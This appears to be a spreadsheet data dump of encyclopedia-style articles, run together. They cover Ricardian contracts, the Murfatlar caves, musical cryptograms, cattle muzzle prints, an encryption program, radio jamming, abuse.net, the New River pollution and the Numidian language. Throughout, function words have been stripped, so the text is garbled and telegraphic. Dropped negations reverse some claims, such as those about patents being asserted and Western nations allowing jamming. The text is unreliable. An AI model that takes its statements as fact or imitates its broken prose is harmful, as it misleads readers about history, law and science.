contract party overtly performed private key. original offerer's signature typically original document, appended form fully binding, readable offer assets described document.later participation parties contract payments smart contract performance typically sign hash identifier generated cryptographic hash function) signed original document. contrast initial signature, hash contract within following transactions also signals intent, forms covert signature contract. although private signatures well studied subject legal frameworks european digital signature directive, grigg suggests trail hashes entanglement forms effective evidence intent private signature. programming pattern pattern design, ricardian contract like reference–object tuple tradition object-oriented programming. reference cryptographic hash function, object formed writing classes handle type contract needed; factory would typically read enough text document figure class type involved, construct object specific class text. once object constructed, interrogated contents: hash, name issuer, nature issue, keys signature status. variations agreement complicated single document describe, documents chained: acceptance offer ricardian contract includes hash offer, acceptance include entire contents earlier phase, design pattern known russian dolls used opentransactions openbazaar. these referral patterns conducted multiple times create chain hierarchy elements. formats relevant decision choosing representation text markup included assist software agent maintaining readability. ricardian contract, parsable program human reader."readability" necessarily defined relative viewing interface. embedded markup systems commonly viewed "raw source", much richer formatting applied. jurists need view "raw" json, latex, users must view html hexadecimal images. some visually impaired readers necessarily different interfaces. even "plain text" editors differ treatment [character sets] [character encodings], os-specific line-ends, fonts, tabs, wrapping long lines, etc. even simple text editor hacked mis-display text desired way, like software can. standard, non-binary data representations underneath users compare multiple viewing solutions, text-based representations opposed binary files practical check source document directly desired (or, commonly done, view fully-formatted views simultaneously). ideal document format also support canonical form hash (cryptographic hash function), delivering hash contents change common serialisation transmission artifacts. latex suitable source generally readable humans, widely-available renderers. also standardized canonical form specifically designed facilitate cryptographic hashing, neutralizes minor syntactic variations insignificant whitespace, platform-specific line-ends, order attributes, etc. popular formats json semantic formats often, though always, much less readable form non-programmers jurists, much subject unbounded syntactic semantic variation. relationship smart contracts smart contracts, defined work nick szabo abstract concept relating automated performance already agreed contract, whereas ricardian contract design pattern capture intent agreement parties, performance.by means hashes within references links external documents, above, ricardian contract form easily extends refer code. explicit referral code pass legitimacy overarching legal prose code, thus implementing concept smart contract.refactoring describe blockchains integrate references smart contract logic created hybrid version ricardian contract. this form proposes tuple {prose, parameters, code} parameters particularise specialise legal prose computer code order create single deal template library components. also known ricardian triple, describe blockchains, smart contracts, devices persons. implementations there several explicit extant implementations ricardian contract design pattern projects implicitly others heading direction, well others used pattern discontinued. amongst explicitly using pattern, used pattern, are: intellectual property ricardian contract free intellectual property restrictions, request implementations cite author link paper. fully published design implementation 1996, described academic paper presented 2004. patent intellectual property mechanism ever asserted inventor, grigg systemics. references</t>
  </si>
  <si>
    <t>Murfatlar Cave Complex</t>
  </si>
  <si>
    <t>basarabi-murfatlar cave complex medieval christian monastery located near town murfatlar (known basarabi 1924–1965 1975–2007), constanța county, northern dobruja, romania. complex relict widespread monastic phenomenon 10th century bulgaria. history rock churches murflatlar, carved chalk hill, discovered 1957. excavations conducted 1957–1960 uncovered complex cells-dwellings, small larger churches, crypts tombs, dating 11th century. from late beginning 11th century territory part first bulgarian empire. inscriptions there many inscriptions engraved walls greek alphabet, slavonic language (bulgarian recension) using glagolitic script using cyrillic script. numerous runic inscriptions turkic type found far. type runes used pliska rosette found building materials century walls first bulgarian capital pliska. turkic runes murfatlar based probably kharosthi script. language runes presumably bulgar, suggested scholars. according romanian researchers, graffiti, including viking navy, interpreted varangian. however, could carved local monks rus' invasion bulgaria. despite numerous attempts cracking murfatlar script, still universally accepted decipherment, rather heterogeneous. nevertheless, likely local monks drew inspiration here. image gallery references external links basarabi cave churches complex general overview inscriptions murfatlar english) съчетанията графична рисунка рунообразен надпис равна мурфатлар. културните текстове миналото, рашо рашев, iii. софия, 2005, 140–148. bulgarian) четенето един рунически надпис мурфатлар северна добруджа, иван иванов минкова, националeн исторически институт музей бaн, софия 2009. bulgarian, english summary) надписи мурфатлара,д-р живко войников russian) popkonstantinov, kazimir 1986: inschriften felsklosters murfatlar. slawischen sprachen 1986, 77–106.(in deutsch)</t>
  </si>
  <si>
    <t>Musical cryptogram</t>
  </si>
  <si>
    <t>musical cryptogram cryptogrammatic sequence musical symbols, sequence taken refer extra-musical text 'logical' relationship, usually note names letters. common best known examples result composers using ciphered versions friends' names themes motifs compositions. much rarer music notation encode messages reasons espionage personal security called steganography. because multitudinous ways notes letters related, detecting hidden ciphers proving accurate decipherment difficult. history from initial assignment western music theorists letter names notes century became possible reverse procedure assign notes letters names. however, seem become recognized technique romantic period. from mid-19th century become quite common. sporadic earlier encipherments used solmization syllables. systems syllables solmization names believed method first used josquin prez missa hercules ferrarie. named soggetto cavato later theorist zarlino. under scheme vowel sounds text matched vowel sounds solmization syllables guido arezzo (where 'ut' root, call 'do'). thus latin name dedicatee 'hercules ferrarie' (ercole d'este, duke ferrara) becomes re-ut-re-ut-re-fa-mi-re, translates d-c-d-c-d-f-e-d modern notation 'ut'. this used cantus firmus mass setting. josquin's method imitated several contemporaries successors, including adrian willaert costanzo festa. letters note names since note names cover letters (reflecting octave repetition names), problem arises cipher rest alphabet. historically main solutions, labelled convenience 'german' 'french' methods. german because development note names took place within framework modes, german-speaking world b-flat named b-natural named 'h'. common musical cryptogram b-a-c-h motif, used johann sebastian bach himself, contemporaries many later composers. other note names derived sound, example e-flat, 'es' german, could represent a-flat digraph 'as'. composers less fortunate bach usually seem chosen ignore non-musical letters generating motifs. example, robert schumann, inveterate user cryptograms, s-c-h-a (e-flat, b-natural, represent carnaval. sometimes phonetic substitution could used, schumann representing bezeth b-e-s-e-d-h. johannes brahms used b-a-h-s (b-flat, b-natural, e-flat) surname a-flat minor organ fugue, mixed language gis-e-la (g-sharp, gisela arnim, among many examples. french 'french' method generating cryptograms arose late 19th century akin normal encipherment. popular version involved writing letters h-n, lines original diatonic notes a-g, follows: enciphered note 'a', (flat natural) this scheme used jules écorcheville, editor journal s.i.m., solicit centenary commemorations joseph haydn 1909, except diverted b-natural, presumably avoid many repeated notes. writing gabriel fauré invitation, camille saint-saëns said writing écorcheville asking prove could signify would annoying mixed farcical business would make laughing stock german musical world." many-to-one mapping method makes difficult extract possible motifs musical score one-to-one correspondence (apart 'as') german system. 20th century french tradition celebratory uses developed haydn centenary, tributes gabriel fauré maurice ravel, florent schmitt, charles koechlin others 1922 (added later arnold bax, 1949) albert roussel francis poulenc, arthur honegger, darius milhaud others (using various ciphering schemes) 1929. honegger's system involved placing letters sharpened flattened notes, example chromatic cryptograms could easily accommodated 20th-century music. olivier messiaen developed full cipher, involving pitches note lengths, organ work méditations mystère sainte trinité (1969).dmitri shostakovich used german scheme personal motto d-es-c-h e-flat, b-natural), representing d.sch, appears many characteristic works. elliott carter featured cryptogram last name "boulez" piece réflexions (2004) sonic symbol first name "pierre".cryptograms less common england, edward elgar, also interested general cryptography puzzles, wrote early allegretto pupils gedge sisters using g-e-d-g-e part 'enigma' enigma variations involves cryptograms. others 1947 friedrich smend suggested bach enciphered significant numbers methods including repetitions motif, word, phrase; notes played continuo; sequence; notes played accompaniment. however, ruth tatlow presented evidence questioning plausibility smend's claims.during first quarter 20th century, american author occultist paul foster case established esoteric musical cryptogram purposes ceremonial magick. system derivative cipher used affiliated magical order called hermetic order golden dawn. each note tone system assigned correspondences including colors, planets, zodiacal signs, hebrew letters. holy names biblical characters translated letter letter linear sequence musical notes, letter could sung congregation unison. ezra sandzer-bell written published books subject, describing paul foster case's system musical cryptography could applied songwriting. word translated phonetically hebrew converted using case's cryptogram generate series notes. sandzer-bell's project involves conversion common latin names plants, trees, mushrooms melodies. each song composed consuming plant tincture form, using physical effects plant determine kind rhythm, harmony, instruments, dynamics use. lengthy demonstration proof concept publicly available author's website. summary signature motifs following list includes motifs known used published works. afor aubrey brain, used gordon jacob's sextet piano winds, inscribed memoriam aubrey brain"a, f)for alban berg hanna fuchs-robettin f.), used berg's lyric suitea, g)for meta abegg, fictional inspiration robert schumann's abegg variations, athe nickname ("acka dacka") ac/dc, used guitar riff band's 1977 song whole lotta rosiea, n)for jehan alain, used maurice duruflé prélude fuge d'alain (op. derived french system leaving b-natural starting second line 'i'a, e)for alfred schnittke vladimir feltzmann, used alfred schnittke sonata h)used schumann's carnaval, romantically involved ernestine fricken, came town german "asch". every piece whole cycle based motifs. letters also note names 'schumann' added motif three displayed breves section 'sphinxes'. noted asch scha also appear title schumann's faschingsschwank wien, 26.[a], e(♮), [a], g)for arnold schoenberg schönberg), 6-z44b♭, es)for brahms, used alfred schnittke quasi sonata along b-a-c-h motif quotations, allusions h)for johann sebastian bachb, n)for joseph haydn, used maurice ravel menuet d'haydn contributors s.i.m. commemoration derived french systemb, f)for mitrofan belyayev, used nikolay rimsky-korsakov, alexander borodin, anatoly lyadov alexander glazunov string quartetb♭, gis, fa)from russian phrase берегись лядова (beregis' lyadova, beware lyadov), used nikolay myaskovsky string quartet efor béla bartók (béla bartók, latter motif recognizing hungarian practice placing family name personal name)c, efor john cage, used pauline oliveros and, composition cage dead, simon jeffes penguin cafe orchestra hfor carl philipp emanuel bach initials name carl philipp (filippo) emanuel bach motif based german musical nomenclature, however initials composer’s name appear partially german italian version, instead philipp filippo. bach motif appears unpublished fughetta major bach, found brussels conservatorium.d, sfor josef dachs. piano teacher vienna conservatory. hans rott probably students conservatory composed dachs-studie string orchestra. h)for dmitri shostakovich schostakowitsch) re)for paul sacher, known sacher hexachorde, a)for elmira nazirova, pupil dmitri shostakovich, used symphony 10e♭, a)for schumann, used carnaval, re-ordering piece's a-s-c-h motiff, ffor frei aber einsam frei aber froh, "free lonely" "free happy" german; former, friend joseph joachim's motto (f-a-e sonata), described "more romantic" latter, "gender-separatist" motto johannes brahms's symphony h)for franz schubert schubert)g, e)for gabriel fauré, used contributors henri prunières' fauré celebration october 1922 issue revue musicale also used years earlier "fauré" collaborative string quartet)g, efor niels gade; motif basis robert schumann's "nordisches lied", album young, subtitle "gruss g."g, h)for gustav holst (gustav holst), used opening motif movement uranus planets.a, sol, ti)for initials london symphony orchestra (=la sol) michael tilson thomas (=mi ti), used oliver knussen flourish fireworks. thomas commissioned knussen opening concert first season principal conductor london symphony orchestra piece "affectionately dedicated michael tilson thomas london symphony orchestra."e, gfor edvard grieg; full name edvard hagerup grieg, motif descending e-minor arpeggio opens piano_sonata_(grieg) also cross motif cruciform composer tributes (classical music) schoenberg hexachord references further reading ondine tobin young (1996). frei aber einsam, frei aber froh: cyphered motives performance practice. university california, santa cruz.</t>
  </si>
  <si>
    <t>Muzzle print</t>
  </si>
  <si>
    <t>muzzle print nose print used distinguishing pattern animal identification. muzzle print primary animal biometric characteristic recognition individual cattle. unique animal identifier similar human fingerprints. methods paper-based inked muzzle print collection techniques available.mobile applications also used collect muzzle images cattle, image storage unique digital identity. references</t>
  </si>
  <si>
    <t>Mujahedeen Secrets</t>
  </si>
  <si>
    <t>mujahedeen secrets (transliterated arabic: asrar al-mujahedeen) encryption program microsoft windows. publicly offered supporters al-qaeda tool protect confidentiality electronic messages. authors software anonymous. uses software allows users encrypt decrypt text messages files range encryption techniques. this primarily ensure parties intercepting messages transmission, internet e-mail cellphone, cannot easily view message's contents. software releases first release: 2007, global islamic media front, propaganda qaeda islamic terrorist groups, announced release mujahedeen secrets software. second release: 2008, updated version, mujahideen secrets released, offering encryption methods. references</t>
  </si>
  <si>
    <t>Radio jamming</t>
  </si>
  <si>
    <t>radio jamming deliberate jamming, blocking interference wireless communications. cases jammers work transmission radio signals disrupt communications decreasing signal-to-noise ratio.the concept used wireless data networks disrupt information flow. common form censorship totalitarian countries, order prevent foreign radio stations border areas reaching country. jamming usually distinguished interference occur device malfunctions accidental circumstances. devices simply cause interference regulated differently. unintentional "jamming" occurs operator transmits busy frequency without first checking whether use, without able hear stations using frequency. another form unintentional jamming occurs equipment accidentally radiates signal, cable television plant accidentally emits aircraft emergency frequency. distinction "jamming" "interference" originally terms used interchangeably nowadays radio users term "jamming" describe deliberate radio noise signals attempt disrupt communications prevent listening broadcasts) whereas term "interference" used describe unintentional forms disruption (which common). however, distinction still universally applied. inadvertent disruptions, electromagnetic compatibility. method intentional communications jamming usually aimed radio signals disrupt control battle. transmitter, tuned frequency opponents' receiving equipment type modulation, can, enough power, override signal receiver. digital wireless jamming signals bluetooth wifi possible power. common types form signal jamming random noise, random pulse, stepped tones, warbler, random keyed modulated tone, rotary, pulse, spark, recorded sounds, gulls, sweep-through. these divided groups: obvious subtle. obvious jamming easy detect heard receiving equipment. usually type noise, stepped tones (bagpipes), random-keyed code, pulses, music (often distorted), erratically warbling tones, highly distorted speech, random noise (hiss), recorded sounds. various combinations methods used, often accompanied regular morse identification signal enable individual transmitters identified order assess effectiveness. example, china, used jamming extensively still does, plays loop traditional chinese music jamming channels (cf. attempted jamming numbers stations). purpose type jamming block reception transmitted signals cause nuisance receiving operator. early soviet attempt jamming western broadcasters used noise diesel generator powering jamming transmitter. subtle jamming jamming sound heard receiving equipment. radio receive incoming signals; everything seems superficially normal operator. these often technical attacks modern equipment, "squelch capture". thanks capture effect, frequency modulated broadcasts jammed, unnoticed, simple unmodulated carrier. receiver locks larger carrier signal, hence ignore signal carries information. digital signals complex modulation techniques, qpsk. these signals robust presence interfering signals. signal relies hand shaking transmitter receiver identify determine security settings method high-level transmission. jamming device sends initiation data packets, receiver begin state machine establish two-way data transmission. jammer loop back beginning instead completing handshake. this method jams receiver infinite loop keeps trying initiate connection never completes effectively blocks legitimate communication. bluetooth consumer radio protocols wifi built-in detectors, transmit channel free. simple continuous transmission given channel continuously stop transmitter transmitting, hence jamming receiver ever hearing intended transmitter. other jammers work analysing packet headers and, depending source destination, selectively transmitting message, corrupting packet. types jammers portable jammers phone-sized low-powered devices. they block data delivery distance meters without barriers. stationary jammers expensive powerful. they usually larger jamming radius wider frequency band. strong jammers require additional cooling overheat. stationary jammers usually range meters require power supply self-made jammers low-power devices work short ranges. however, coverage extended using broadband amplifiers. history during world ground radio operators would attempt mislead pilots false instructions language, precisely spoofing attack jamming. radar jamming also important disrupt radar used guide enemy's missiles aircraft. modern secure communication techniques methods spread spectrum modulation resist deleterious effects jamming. jamming foreign radio broadcast stations often used wartime (and periods tense international relations) prevent deter citizens listening broadcasts enemy countries. however, jamming usually limited effectiveness affected stations usually change frequencies, additional frequencies and/or increase transmission power. jamming also occasionally used governments germany (during world ii), israel, cuba, iraq, iran (during iran-iraq war), china, north south korea several latin american countries, well ireland pirate radio stations radio nova. united kingdom government used coordinated, separately located transmitters offshore radio ship, radio north international coast britain 1970. world occupied europe nazis attempted broadcasts continent allied stations. along increasing transmitter power adding extra frequencies, attempts made counteract jamming dropping leaflets cities instructing listeners construct directional loop aerial would enable hear stations jamming. netherlands aerials nicknamed "moffenzeef" (english: "kraut filter"). cold since soviet union started jamming western radio broadcasts soviet union 1948 primary targets external broadcasting services, voice america (voa) especially rfe/rl. western nations allowed jamming prior world post-war western view jamming violates freedom information soviet view international principle national sovereignty jamming acceptable response foreign radio broadcasts.during much cold war, soviet (and eastern bloc) jamming western broadcasters "power race" broadcasters jammers alike repeatedly increased transmission power, utilised highly directional antennas added extra frequencies (known "barrage" "frequency diversity" broadcasting) already heavily overcrowded shortwave bands extent many broadcasters directly targeted jammers (including pro-soviet stations) suffered rising levels noise interference.there also periods china soviet union jammed other's programmes. soviet union also jammed albanian programmes times. some parts world impacted broadcasting practices others eurasia (worst affected, including mediumwave frequencies particularly used rfe) north asia, americas sub-saharan africa (partly affected) australasia, south america (rarely affected)meanwhile, listeners soviet union eastern bloc devised ingenious methods (such homemade directional loop antennas) hear western stations noise. because radio propagation shortwave difficult predict reliably, listeners sometimes found days/times jamming particularly ineffective radio fading (due atmospheric conditions) affecting jamming signals favouring broadcasts phenomenon sometimes dubbed "twilight immunity"). days course reverse case. there also times jamming transmitters (temporarily) breakdowns maintenance. soviets (and eastern bloc allies) used types jamming transmitter. skywave jamming covered large area reasons described limited effectiveness. groundwave jamming effective small area thus used in/near major cities throughout eastern bloc. both types jamming less effective higher shortwave frequencies (above mhz); however, many radios soviet union cover higher bands. skywave jamming usually accompanied morse signals order enable (coded) identification jamming station order soviet monitoring posts could assess effectiveness station. 1987 decades generally refusing acknowledge jamming even taking place soviets finally stopped jamming western broadcasts exception rfe/rl continued jammed several months 1988. previously periods individual eastern bloc countries refrained jamming western broadcasts varied widely time country. general outside soviet union bulgaria prolific operators jamming transmitters eastern bloc east germany least.while western governments occasionally considered jamming broadcasts eastern bloc stations, generally accepted would pointless exercise. ownership shortwave radios less common western countries soviet union where, vast physical size country, many domestic stations relayed shortwave practical cover remote areas. additionally, western governments generally less afraid intellectual competition eastern bloc. francoist spain dictatorship jammed decades radio españa independiente, radio station communist party spain broadcast moscow (1941–1955) bucharest (1955–1977). important clandestine broadcaster spain regime considered threat, since allowed citizens skip censorship local media.however, latin america instances communist radio stations radio venceremos jammed, allegedly cia, short lived instances britain jammed egyptian (during suez crisis), greek (prior cyprus gaining independence) rhodesian stations. post cold (1989–present) china 2002, china acquired standard short-wave radio-broadcasting equipment designed general public radio-broadcasting technical support thales broadcast multimedia, former subsidiary french state-owned company thales group. thales jamming technology operates power levels (for shortwave jamming products). adele milna (bsee) continental electronics audio file held shortwave.org) claims china duplicated company's shortwave transmitters. unclear products indeed duplicated broadcast jamming opposed future product sales) reason duplication. iran debates raised iran regarding possible health hazards satellite jamming. iranian officials including health minister claimed jamming health risk humans. however, minister communication recently admitted satellite jamming 'serious effects' called identification jamming stations stop practice. government generally denied involvement jamming claimed sent unknown sources. according sources, irgc organization behind satellite jamming iran. russia russian armed forces have, since summer 2015, begun using multi-functional weapon system ukraine, known borisoglebsk postulated system defeated communications parts country, including mobile telephony systems. other countries since early 1960s, practice radio jamming common cuba, blocking american government funded radio stations (such voice america) also radio signals, stations owned and/or operated selling airtime cuban exile groups transmitting miami, cubanisima, radio mambi, wwfe poderosa cadena azul. practice applied radio televisión martí, operated u.s. information agency since 1985. north korea south korea still regularly other's radio (and sometimes television) stations. several middle eastern countries (particularly iran) shortwave broadcasts (and even occasionally attempt satellite signals) targeted countries. pakistan contemplated jamming pirate radio stations operated taliban jails across pakistan. this decision outcry pakistani cellular operators, state jails urban areas resultant impact cellular service operators adjacent area jails. ethiopia jammed transmissions well esat ethiopian satellite television eritrean radio stations. vietnam jams vietnamese service radio free asia, radio song núi, febc programs, mostly vietnamese minority languages well radio sweden "siren" jammer "bubble" jammer frequencies. nigeria, nigerian broadcasting commission claimed jamming signal radio biafra. south africa, wireless signal jammers illegal. there single exception rule. south africa's state security cluster may, certain instances, employ signal jammers. fiction radio jamming "comm jamming") common plot element star wars franchise. star wars: episode return jedi, rebel fleet approaches galactic empire's force, believing launching surprise attack, general lando calrissian realizes empire jamming signals, therefore know approaching. film star trek receiving distress call space station regula captain kirk attempts establish communications, enterprise's comm officer uhura reports transmissions "jammed source". also references external links extensive site radio jamming article recent jammers audio samples audio sample jamming (c1982) start world service (russian) programme includes jamming station morse ethiopia jams (2010) ultra fast folloow jammer description (2007) pleikys, vildžiūnas. empire noise (video). aadu jogiaas: disturbing soviet transmissions august 1991. portable jammer illegal. words: matt bolton, photographs: matt munro tallinn cables, glimpse into tallainn's secret history espionage lonely planet magazine, december 2011</t>
  </si>
  <si>
    <t>Network Abuse Clearinghouse</t>
  </si>
  <si>
    <t>network abuse clearinghouse, better known abuse.net, maintains contact database reporting network abuse. makes entries database available (via web, dns, whois), provides intermediary service registered users forward complaints e-mail.in 1997, abuse.net started experimental service users send complaints domain.name@abuse.net clearing. also anti-spam techniques (e-mail) hacker (computer security) news.admin.net-abuse.email phishing spamming cyberbullying references external links official website</t>
  </si>
  <si>
    <t>New River (Mexico–United States)</t>
  </si>
  <si>
    <t>river (spanish: nuevo) flows north near cerro prieto, city mexicali, baja california, mexico, united states city calexico, california, towards salton sea. river channel existed since pre-historic times. however, river known today formed levee failure massive flooding filled salton sea. river flow mostly consists agricultural runoff, municipal discharge industrial wastewater. river called severely polluted river size united states. several projects begun reduce mitigate levels pollution river, including upgrades sewage treatment infrastructure enclosure river channel.the california office environmental health hazard assessment issued safe eating advisory fish caught river elevated levels mercury, ddts, pcbs, selenium. flow river channel begins volcanic lake near cerro prieto. today lake feeds cerro prieto geothermal power station. river flows north miles baja california another miles (106 california salton sea, largest lake california. flow border approximately ft/s (5.7 m3/s), thrice salton agricultural runoff collected along way. river's flow composed agricultural chemical runoff waste farm industry irrigation u.s. (18.4%) mexico (51.2%), sewage mexicali (29%), manufacturing plants operating mexico (1.4%). where river crosses mexico–u.s. border near calexico, california, channel contains stew hundred contaminants: volatile organic compounds, heavy metals including selenium, uranium, arsenic mercury, pesticides (including ddt), pcbs. waterway also contains pathogens cause tuberculosis, encephalitis, polio, cholera, hepatitis typhoid; levels many contaminants violate united states environmental protection agency (epa) cal/epa standards several hundredfold.fecal coliform bacteria reached 100,000 million colonies milliliter border checkpoint (possibly more, measuring capacity threshold), u.s.–mexico treaty limit colonies. 2017 monthly samples river ranged 12,000 160,000 milliliters. california considers water safe swimming 400.highly polluted inflow river agricultural runoff resulted elevated bacterial levels large algal blooms salton sea. lacking outlet water, salton sea's salinity increased approximately year. increasing water temperature, salinity bacterial levels massive fish die-offs 1992, 1994, 1996, 1999, 2006, 2008, created ideal breeding grounds avian botulism, cholera newcastle disease, leading massive avian epizootics 1992–2019. currently, salton salinity 4.4% (4.4 parts 100), making saltier ocean water (3.5% pacific). many species fish longer reproduce survive salton sea. tilapia fish species able persist limited time. without restoration, salton likely increase toxicity, remain ecological trap avian species. toxic levels pcbs, byproduct regularly appear sediment samples taken 2002 2012. history modern courses river alamo river, creation salton sea, date autumn 1904 heavy rainfall snowmelt caused swollen colorado river overrun headgates alamo canal. resulting flood poured canal breached imperial valley dyke. sudden influx water lack drainage basin formed salton sea; rivers re-created great inland salton sink, frequently flooded before. nearly years passed workers could control colorado river's flow stop flooding, river effectively dammed early part 1907 returned normal course. flood significantly enlarged channels alamo rivers. some water still flowed dyke repaired, larger channels collected carried agricultural runoff salton sea. although thorough documentation pollution prior 1960 available, records show river identified significant water pollution problem since late 1940s. extremely high concentrations fecal coliform bacteria caused stench entry u.s. under provisions 1944 water treaty mexico, united states mexico agreed solve border sanitation problems. international boundary water commission (ibwc) authorized governments study pollution river mexico. studies 1947 1948 river ibwc recommend joint treatment plant constructed united states treat sewage calexico mexicali.as mexicali's population exploded 1970s, pollution increased. inadequate sewer infrastructure, nations attempted 1980s 1990s address pollution river, documented international boundary water commission u.s. department state. ibwc established 1889 maintain border, allocate river waters nations, provide flood control water sanitation. once viewed model international cooperation, recent decades ibwc heavily criticized institutional anachronism, by-passed modern social, environmental political issues.after north american free trade agreement (nafta) 1990s, industrial manufacturing increasingly contributed pollution. mexico's relatively environmental regulations manufacturing plants maquiladoras, allowed plants river industrial waste drainage system. mexicali become bustling border city maquiladoras.in 1990s, joint project implemented improve mexicali's wastewater infrastructure. paid million upgrade mexicali's sewage treatment facilities, improvements treat waste discharges river. residual pollution affects mexico, imperial valley california, deposited salton sea.in 2018, construction began bollard portion mexico–united states barrier across river. 2018, river mexicali covered, sometimes overflowed covered riverbanks rained. environmental issues smell river near border often overpowering, particularly night summer temperatures reach °c). river heavily polluted technicians usually wear sets gloves, aprons protective clothing testing water. border patrol agents instructions stay river except emergencies. january 2019, chemicals, heavy metals, sewage found river. discarded trash, dead animals waste line channel, whose foam blows streets calexico residential area downtown. mosquitoes pests thrive summer. factors serve elevate contagion risk. 2006, another binational project, mexicali finished building second wastewater treatment facility treat million gallons (38,000 76,000 partially treated sewage discharged river. 2005, river designated environmental justice water quality pilot projects state california environmental protection agency (calepa) address various pollution sources collaboratively various stakeholders. legislative changes: july 2005, governor california arnold schwarzenegger signed senate bill 387, introduced senator denise moreno ducheny (d-san diego), provided funding river improvement project. involves four main components: trash screen; construction enclosed culvert alongside current river channel developed areas calexico normal flow re-routed culvert, thereby eliminating resident exposure allowing treatment contaminated flows; construction wetlands address overall pollution, including pollution sources united states; construction green belts recreational facilities restored river floodplain. outlook according colorado river regional water quality control board, wastewater treatment facility fully operational, handle million gallons (38,000 76,000 sewage currently discharged river. while result measurable improved water quality river border, particularly relates pathogens nutrients, binational projects address dumping trash river tributaries, nutrients pathogens mexicali's zaragoza wastewater treatment lagoons, untreated partially treated discharges industrial wastes, agricultural runoff mexicali valley, urban storm runoff municipality. mexico intends reclaim effluent treatment plant onsite green belts, resulting million gallons (76,000 decrease flow river border, addition projected million gallons (38,000 decrease flow river border intergen sempra energy power plants reach capacity mexicali. estimated decrease flow projects pursuant terms quantification settlement agreement, water transfer imperial irrigation district diego county water authority, devastating water quality impacts salton sea.according imperial irrigation district, although water pollution severe problem border, time river enters salton sea, issue "not significant"; water quality improves water makes north addition agricultural drain water natural cleansing occurring intervening miles km). agricultural pesticides never detected salton levels high enough cause public health concern. also lake cahuilla salton tributaries salton mexico–united states border calexico, california mexicali references external links river most polluted river north america (video documentary) "troubled waters" documentary river california connected, june 2006.</t>
  </si>
  <si>
    <t>Numidian language</t>
  </si>
  <si>
    <t>numidian language spoken ancient numidia, territory covering much northern africa. although script written, libyco-berber (from tifinagh descended), almost fully deciphered characters (apart exceptions restricted specific areas) known values, language barely deciphered words known. libyco-berber inscriptions attested century century language scarcely attested confidently identified belonging afroasiatic family. dialects relation ancient languages dialects foreign influences known orthographical difference western eastern numidian language. starting kabylia, kind mixed region, regions east modern tunisia used east-libyc writing system, regions west approximately moulouya river spoke western numidian dialect, used larger still undecoded west-libyc writing system. east-numidian dialect much influenced punic language west-numidian, west-numidian thought ancient east-numidian. numidian influenced mostly punic roman, although numidian even modern berber vocabulary seem also slightly influenced paleohispanic languages possibly pre-indo-european languages. other ancient berber berber-like languages much known variations libyc language(s) none fully deciphered, outside east-numidian steles none various libyc writings interpreted. possible language neighbouring mauri people modern-day morocco dialect larger numidian, although little sources researches language. numidian berber language known stage breakup proto-berber various berber languages still fully complete, thus ancient berber languages time similar other, even modern ones. circa various nomadic berber groups penetrated sahara north, corresponding area later gaetulians. although area nomads lived yielded writing thus incomparable numidian, known pliny elder described saharan gaetulian language similar numidian one, implying gaetulian language dialect numidian.not much known numidian language, even less berber proto-berber languages dialects time, although known example language native berbers cyrenaica contained many greek loanwords according herodotus. also unknown whether mauretanian language neighbouring kingdom mauretania approximately modern morocco formed part numidian language, separate language major efforts decoding known sources describing categorization reconstruction massylii, spoke language, ethnically berber, supposed numidian therefore berber language. berber branch afro-asiatic sometimes called libyco-berber since certain whether numidian would fall within modern berber languages form sister branch them. some theorize constituted group own, trace noun-case system shared modern berber languages. however, proto-berber theorized grammatical case either, would also imply later addition system. lybico-berber tifinagh phoenician alphabet abjads without vowels complicates matter even more.work deciphering language decisive, although especially recently tried reconstruct words comparing numidian script proto modern berber languages. most remaining scripts funerary, follow formula w-y" also often returning words script, probably meant "tomb of". many words them, function unclear. gravestones show different word personal names, plausibly interpreted kinship term based berber comparisons: "daughter (of)" (modern berber wəlt), and, rarely, "mother (of)" (modern tuareg ma). similar modern berber languages, ta-...-t circumfix signified feminine version word silent added dougga inscriptions political positions mentioned, "gld" (lord) based technique, translated modern berber word "agellid" originates proto-berber word "*a-gəllid". verbs unambiguously identified various inscriptions. comparison modern berber suggests ṣkn, probably read "eṣ(ə)k-n based modern berber comparison means"built" analysed "build" plus marking subject agreement (-ən).an example translation using method demonstrated part numidian inscription read "msnsn. gldt. w-gjj." "msnsn" name king massinissa "gldt" word king. finally, "w-gjj" means "son gaia". thus attempting translate numidian text modern proto-berber inscription would read "massinissa king, gaia".numidian also featured shared prepositions (of) (and) modern berber, along various prefixes, "ta...-t", "m-" etc. modern berber.these facts would strongly suggest numidian extinct branch berber languages, although completely accepted linguists still criticize theory. naming conventions numidian names generally often followed complicated, well documented naming convention berber antiquity medieval times. while always case, especially true nobles higher leaders. worked simple: verb person personal pronouns affix (direct indirect) person plural form (he/she-x-they/of them).for example, actual name jughurta likely sounded "y-uger-ten" surpasses them), name king massinissa (msnsn libyco-berber) "mas-nsen" (their seignor) known words here comparison known numidian words modern northern berber languages tuareg tamashek language. normalized words vowels added written brackets. underlined words based etymologic reconstructions numidian names. this comparison suggests numidian closest modern northern berber languages zenati languages, shilha language, kabyle language although modern northern berber languages gone grammatical changes, also taken loanwords arabic, latin, french. kabyle closest numidian, absorbed loanwords phrases languages mentioned.according many linguists many numidian words either silent disappeared modern times, many cases mswh mwsnh possibly used replacement for, possibly ancestor modern berber sound. thugga inscription thugga inscription longest known numidian inscription yet, served clues regarding language. numidian script ṣkn•tbgg•bnyfš•msnsn•gldṯ•wgyy•gldṯ•wzllsn•šfṭ sbsndh•gldṯ•sysh•gld•mkwsn šfṭ•gldṯ•wfšn•mwsng•šnk•wbny•wšnk•dšfṭ•wm wtnkw•mṣṣkw•mgn•wyrštb•wsdyln•gẓb•mgn•wšfṭ•mw wšmn•gldṯ•gldgmyl•zmr•wmsnf•wšmn•gldmṣk•m wšyn•gldṯ•wmgn•gldṯ•ṭnyn•šyn•wnkkn•wfṭš•dr šfṭ•wšnk• normalization adding known possible vowels əṣk(ə)-n tubgag bnyfš[?] masnsen a-gəllidṯ u-gayya a-gəllidṯ u-zelalsen šufeṭ asəbbas a-gəllidṯ(?) s-yusa a-gəllid mikiwsantranslation punic people thugga built temple masinissa king gaia king zilalsan judge, tenth year since micipsa ruled, year shufet king afshan king, centurion: shanok banay shufet magon tanaku. magon yirashtan sadyalan, gzby: magon shufet centurion abdeshmun king. erectors property: ashyan ankikan patash arash shufet shanok. example texts these texts examples bilingual inscriptions known meanings, funerary texts bilingual texts cenotaph inscription punic [mn]ṣbt š'ṭbn ypmṭt hbnm š'bnm ʕb'rš ʕbdštrt 'ṭbn ypmṭt mngy wrsbn wb'zrt **t* wṭmn wwrskn hḥršm msdl nnpsn w'nkn b[n] hnskm šbrzl wppy punic english translation monument 'ṭbn ypmṭt plw. builders stones: ʕb'rš ʕbdštrt; 'ṭbn ypmṭt plw; mngy wrsbn. ???, wrskn. workers wood: msdl nnpsn 'nkn 